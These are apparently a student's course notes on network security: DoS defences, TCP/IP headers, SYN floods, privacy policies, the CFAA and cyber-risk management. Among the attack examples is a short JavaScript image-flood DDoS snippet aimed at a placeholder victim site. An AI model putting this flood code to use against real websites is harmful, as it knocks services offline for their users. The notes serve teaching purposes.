Category: Security

SSL/TLS handshake
RSA Encrypt -> RSA Decrypt

DoS Mitigation
Client puzzle: slow down attacker
Moderately hard problem: given challenge c find x such that
-LSBn(SHA-1 (c || x)) = 0^n
hardness of challenge:n
-decided based on DoS attack volume
Limitations:
-requires changes to both clients and servers
-Hurts low power legitimate clients during attack
CPU power ratio
-high end server / low end cell phone = 8000
-> impossible to scale to hard puzzles
Interesting observation
– Main memory access time ratio
– high end server / low end cell phone = 2
Solution requires many main memory accesses
– dwork-goldberg-naor, crypto
– abadi-burrows-manasse-wobber, acm toit

Traceback
-given set of attack packets
-determine path to source
assumption
-most routers remain uncompromised
-attacker sends many packets

IP header format
-connectionless
-unrerliable
-best effort

version, header length, type of service, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source address of originating host, destination address of target host, options, padding, ip data

TCP
-session based, congestion control, in order delivery
source port, dest port, seq number, ack number, urg, ack, psh, psr, syn, fin, other stuff

TCP handhake
syn: SNc <- randc, ANc <- 0 SYN packets with random source IP addresses Fills up backlog queue on server No further connections possible A classic SYN flood example MS Blaster worm(2003) - SYN flood on port 80 to windowsupdate.com -50 SYN packets every second, each packet is 40 bytes -spoofed source IP:a.b.X.Y where X,Y random Low rate SYN flood defenses Non-solution -increase backlog queue size or decrease timeout Correct solution - sycookies: remove state from server Massive flood
command bot army to flood specific target
20,000 bots can generate 2Gb/sec of SYNs
at web site:
saturates network uplink or network router
random source IP -> attack SYNs look the same as real SYNs

Idea: only forward established TCP connections to site

Stronger attacks: TCP connection flood
Command bot army
-complete TCP connection to web site
-send short HTTP head request
-repeat

will bypass SYN flood protection proxy but
attacker can no longer use random source IPs
reveals location of bot zombies
proxy can now block or rate-limit bots

Javascript-based DDoS:
github.com <- honest end user <- inject imageFlood.js <- popular server imageFlood.js

Function imgflood(){
	var TARGET = ‘victim-website.com/index.php?’
	var rand = Math.floor(Math.random() * 1000)
	var pic = new Image()
	Pic.src = ‘http://’+TARGET+rand+’=val’
}
setInterval(imgflood,10)

subnet spoofing: Generate random addresses within a given address space
random spoofing: Generate 32-bit numbers and stamp packets with them.
fixed spoofing: The spoofed address is the address of the target.

server application: the attack is targeted to a specific application on a server
network access: the attack is used to overload or crash the communication mechanism of a network
infrastructure: the motivation of this attack is a crucial service of a global internet operation, for example core router

application
-> small number of packets -> big effect
application attacks:
DoS bug: Design flaw allowing one Machine to disrupt a service
Dos flood: Command botnet to generate flood of requests
sample Dos at different layers: link, TCP/UDP, application

What information is collected about you?
– Personal information like name, email address, credit card, telephone number etc. that we provide to create an account.
– Service we visit a certain a website. Use it for advertising.
– Device information: hardware model, OS, network information(IP address) etc.
– Search queries
– Who we call? For long we talk?
– Cookies
– Location information
– Applications

How is collected information used?
improve user experience (personalization)
for serving you targeted advertisements – we can set ad preferences

Who do they share it with?
with opt-in, can share with companies, individuals and organizations outside of Google.
Domain administrators and re sellers who provide user support to your organization can get certain information about you that you give to Google.
Affiliates and other trusted businesses or persons with appropriate confidentiality and security measures.
For legal reasons.

Information security
-many services use encryption
-stronger authentication(two factor)
-Other safeguards

Changes to privacy policy
-Will not reduce user rights without your consent

Facebook Privacy Policies
Do companies adhere and operate according to the privacy policy you gave consent to?
Not really, Facebook had issues and actually the US Federal Trade Commission went after it for violation of user privacy.

Do we need privacy only for individuals?
Universities, hospitals, charities require privacy and need to protect data of people they serve or have as employees.

Threads to Privacy
-Traffic analsis
-Surveillance
-Linking and making inferences

social media, tracking of web browsing, location aware applications, sometimes we are willing parties.

Privacy Threats to Online Tracking Info
-collection of information about you – with or without your consent?
-Usage – only used for specified purpose you agreed to?
-Information retention – how long can they keep it?
-Information disclosure and sharing -disclosed to only authorized or agreed to parties?
-Privacy policy change – can information collector/holder change to a more lax policy without your agreement?
-Information security – identity and access management, monitoring, secure against various threats we discussed.

Difference between law and ethics
– individual standard vs. societal
– No external arbiter and enforcement unlike law
– Examples – What do you do when you discover a vulnerability in a commercial product? Ethical disclosure?
– Code of ethical conduct(IEEE, ACM, university)

Privacy
Definition: A user’s ability to control how data pertaining to him/her can be collected, used and shared by someone else.

Privacy is not a new problem
– people have always worried about what others(friends, enemies, governments) might know about what they do.
– Scale and magnitude at which information about us and our activities can be collected, ways in which it can be used, and shared or sold.

Privacy
– financial statements, credit card statements, banking records etc.
– Health/medical conditions
– legal matters
– biometrics
– political benefits
– school and employer records
– web browsing habits? what do we search, what do we browse? websites we visit?
– Communication(emails and calls)
– Past history(right to be forgotten)

What is not private?
Where i live? my citizenship?
i am registered to vote?
My salary(state employee because Georgia Tech is a public university)

Cyber crime
– data thef, identity theft, extortion etc.
Copying and distribution of digital object(software, music)
– copyright, patents, trade secrets
– how are these applicable in the context of digital/computer objects?
Privacy
– Who can collect my information, how can I control it, how could it be used etc.?

US Computer Fraud and Abuse Act(CFAA)
– Defines criminal sanctions against various types of abuse
– Unauthorized access to computer containing:
– data protected for national defense
– banking or financial information
– Unauthorized access, use, modification, destruction, disclosure of computer or information on a system operated by or on behalf of US govt.

US Computer Fraud and Abuse Act
– Accessing without permission a protected computer(any computer connected to the internet)
– Transmitting code that cause damage to computers(malware)
– Trafficking in computer passwords

– Investments in cyber security are driven by risk and how certain controls may reduce it
– Some risk will always remain
– How can risk be assessed?

Risk exposure = Prob. [Adverse security event]* Impact[ adverse event ]
Risk Leverage = Risk exposure before/without a certain control – risk exposure after the control / cost of control

Risk leverage > 1 for the control to make sense

How do we assess and reduce cyber risk?
impact
– expected loss(reputational, recovery and response, legal, loss of business etc.)
Risk management
– accept, transfer(insurance) and reduce
– reduction via technology solutions, education and awareness training

Enterprise Cyber Security Posture
– Reactive
– regulation/compliance
– customer demands
– in response to a breach(Target or Home Depot)
– In response to events

Proactive:
– champion of an organization who has influence
– board level conversation about cyber security and risk

Economic value argument:
– return on investment(RoI)
– Estimating costs and benefits is tricky
– Perception vs. data-driven risk

Values at risk
– assets, reputation etc.
Threats and attack vectors
Plan, implement and manage
– Deploy appropriate controls
– Empower people and hold them responsible
– Plan for response and remediation (do not be surprised)
– User awareness
Understand and proactively address risk

What needs to be secured?
Who is responsible for it?
What technical/non-technical control should be deployed?
How are people supported to do what they need to do?
What if somthing goes wrong?
Response and recovery
Accountability and consequences

What needs to be secured?
Hardware, software and services
– servers, routers, switches, laptops and mobile devices
– OS, databases, services and applications
– Data stored in databases or files
From whom?
– Remote hackers?
– Insiders?

Identify and access management(IAM)
– Credentialing, account creation and deletion
– password policies
Network and host defenses
– firewall, IDS, IPS
– Anti-virus
VPN and BYOD
Vulnerability patching
User awareness and education
– Pishing attack awareness(Phishme)

High level articulation of security objectives and goals
– legal, business or regulatory rationale
– Do’s and don’ts for users
password length
Web and email policies
Response to security events
– Address prevention, detection, response and remediation as it concerns/impact users

Management Security
-Technical controls(authentication, access control etc.) are used to reduce the risk of attacks on valuable asset.
What assets need to be secured and from whom.

Organization Context
legal and compliance drivers for cyber cecurity
financial and health data
what technical control should be deployed?
must understand risks posed by threats
costs and benefits of security measures

Key Challenges
what assets are under risk?
What are the threats and how serious is the risk posed by them?
likelihood of successful attack and its impact

What technological solutions/controls exist to counter threats?
How can we address risk in a cost-effective manner?
cost is less than reduction in risk
How do we understand people and process aspects of cyber security management?